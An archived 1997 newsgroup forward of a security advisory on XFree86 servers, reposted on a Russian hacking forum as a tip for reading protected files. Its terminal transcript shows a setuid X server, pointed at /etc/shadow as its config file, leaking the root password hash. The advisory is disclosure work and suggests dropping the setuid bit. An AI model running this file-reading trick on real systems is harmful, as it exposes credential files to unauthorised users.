(fwd) XFree spy

Andrey Gerzhov (kittle@freeland.alex-ua.com)
Sat, 29 Nov 1997 23:49:15 +0200 (EET)

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Andrey Gerzhov: "(fwd) ? 24000"
Previous message: Andrey Gerzhov: "(fwd) Re: УНА-УНСО: АНКЕТА ПРИХИЛЬНИКА"

-- forwarded message --
Path: freeland.alex-ua.com!barmaglot.alex-ua.com!f188.n463.z2!f116.n463.z2!f58.n463!f238.n5020!f443.n5020!f509.n5020!f215.n5020!f23.n5030!f48.n5030!not-for-mail
Newsgroups: fido.ru.nethack
Distribution: fido
X-Comment-To: All
From: Ricky Lyte <Ricky.Lyte@p58.f48.n5030.z2.fidonet.org>
Date: Fri, 28 Nov 97 15:41:03 +0200
Subject: XFree spy
Message-ID: <880731754@p58.f48.n5030.z2.ftn>
Organization: Welcome to the world of Emotional Degradation!
X-FTN-AREA: RU.NETHACK
X-FTN-MSGID: 2:5030/48.58 347ee66a
X-FTN-PID: GED B0116 2000OS3
X-FTN-TID: GE 1.11+
X-FTN-Tearline: 1984!
X-FTN-Origin: Welcome to the world of Emotional Degradation! (2:5030/48.58)
X-FTN-SEEN-BY: 463/58 72 116 159 188 690 691 6666 4614/1 6 4615/21 4631/13 5000/7
X-FTN-SEEN-BY: 5020/37 47 52 68 114 200 204 214 215 225 238 293 294 308 400 405
X-FTN-SEEN-BY: 5020/418 421 423 427 443 462 477 509 620 642 644 724 927 964 1007
X-FTN-SEEN-BY: 5020/1038 1215 5023/11 5027/16 5030/2 6 16 23 48 54 82 108 110 142
X-FTN-SEEN-BY: 5030/145 148 163 168 181 182 207 239 248 254 272 290 299 305 317
X-FTN-SEEN-BY: 5030/318 325 334 338 341 396 444 500 568 686 5032/6 5040/6 47
X-FTN-SEEN-BY: 5049/256 5054/3 9 5065/10 5075/10 5077/3 38 5084/10
X-FTN-PATH: 5030/48 23 5020/215 509 443 238 463/58 116
X-FTN-PATH: 463/188
Lines: 81
Xref: freeland.alex-ua.com fido.ru.nethack:496

А как насчет чтения файлов, к котоpым нет достyпа? Вот и подсказка!

plaguez security advisory n.10

XFree86 insecurity

Program: XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)

Version: Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2.
Other versions as well.

OS: All

Impact: The XFree86 servers let you specify an alternate configuration
file and do not check whether you have rights to read it.
Any user can read files with root permissions.

hello,
just a short one to tell you about this "feature" I found in all default
XFree86 servers...

Here it is:

Script started on Sat Aug 23 15:32:36 1997
Loading /usr/lib/kbd/keytables/fr-latin1.map
[plaguez@plaguez plaguez]$ uname -a
Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
[plaguez@plaguez plaguez]$ ls -al /etc/shadow
-rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow
[plaguez@plaguez bin]$ id
uid=502(plaguez) gid=500(users) groups=500(users)
[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
use: X [:<display>] [option]
-a # mouse acceleration (pixels)
-ac disable access control restrictions
-audit int set audit trail level
-auth file select authorization file
bc enable bug compatibility
-bs disable any backing store support
-c turns off key-click

... and so on. HINT: look at the first XF86_SVGA output line.

Patch:
------

If you run xdm, you should consider removing the setuid bit of the
servers.

If not, well, wait for the XFree86 Project to bring you a patch, since I'm
too lazy to find and fix it.

later,

-plaguez
dube0866@eurobretagne.fr

-----------------

Team Porno-Grafica

-- end of forwarded message --

Kittle

Next message: Andrey Gerzhov: "(fwd) ? 24000"
Previous message: Andrey Gerzhov: "(fwd) Re: УНА-УНСО: АНКЕТА ПРИХИЛЬНИКА"